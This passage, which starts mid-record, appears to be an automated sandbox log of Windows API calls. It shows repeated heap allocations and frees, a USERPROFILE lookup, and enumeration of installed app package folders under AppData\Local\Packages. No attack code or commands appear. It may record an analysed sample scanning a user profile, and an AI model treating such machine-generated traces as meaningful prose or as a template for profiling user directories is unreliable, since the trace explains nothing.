lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0176.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0176.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0177.000] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0177.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0177.001] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0177.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0177.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0177.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0177.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0177.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0177.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0177.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0177.001] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0177.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0177.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0177.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0177.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0177.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0177.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0177.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0177.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0177.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0177.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0177.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0177.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0177.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0177.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0177.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0177.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0177.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0177.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0177.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0177.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0177.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0177.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0177.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0177.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0177.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0177.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0177.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e) returned 0x29eb3c8 [0177.002] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Packages", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpFilePart=0x8cedf4*="Packages") returned 0x26 [0177.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb3c8 | out: hHeap=0x2af0000) returned 1 [0177.002] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages")) returned 0x10 [0177.002] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe87ff8e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e2238 [0177.002] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe87ff8e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a729855, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7a79bf59, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7a79bf59, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy", cAlternateFileName="1527C7~1")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b15e23b, ftCreationTime.dwHighDateTime=0x1d32719, ftLastAccessTime.dwLowDateTime=0x8b92dcc4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8b92dcc4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="9E2F88E3.Twitter_wgeqdkkx372wm", cAlternateFileName="9E2F88~1.TWI")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1206ac31, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x1206ac31, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x1206ac31, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83df20d8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x83eb0c97, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x83eb0c97, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy", cAlternateFileName="C5E252~1")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8306d465, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x83105dc2, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x83105dc2, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CortanaListenUIApp_cw5n1h2txyewy", cAlternateFileName="CORTAN~1")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81df3049, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81e65763, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x81e65763, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="DesktopLearning_cw5n1h2txyewy", cAlternateFileName="DESKTO~2")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80cf63bf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x80d4289c, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x80d4289c, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="DesktopView_cw5n1h2txyewy", cAlternateFileName="DESKTO~1")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x79ed145d, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x79f1d90f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x79f1d90f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy", cAlternateFileName="E2A4F9~1")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c412157, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7c48483f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7c48483f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="EnvironmentsApp_cw5n1h2txyewy", cAlternateFileName="ENVIRO~1")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7db9d550, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7dbe9a15, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7dbe9a15, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="HoloCamera_cw5n1h2txyewy", cAlternateFileName="HOLOCA~1")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e441dff, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7e48e2a2, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7e48e2a2, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="HoloItemPlayerApp_cw5n1h2txyewy", cAlternateFileName="HOLOIT~1")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ed0c8e8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7ed0c8e8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7ed0c8e8, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="HoloShell_cw5n1h2txyewy", cAlternateFileName="HOLOSH~1")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50830815, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x12383999, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0x12383999, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.3DBuilder_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.3DB")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a89eb27, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4609348, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd4609348, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", cAlternateFileName="MICROS~1.BRO")) returned 1 [0177.003] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x627e1477, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x802f4316, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x80471ab5, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.AccountsControl_cw5n1h2txyewy", cAlternateFileName="MICROS~1.ACC")) returned 1 [0177.004] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda8902b6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xda94ee85, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xda94ee85, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Advertising.Xaml_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.XAM")) returned 1 [0177.004] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4cf90959, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xfafb82b, ftLastAccessTime.dwHighDateTime=0x1d32745, ftLastWriteTime.dwLowDateTime=0xfafb82b, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Appconnector_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.APP")) returned 1 [0177.004] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b091f87, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc89dadb, 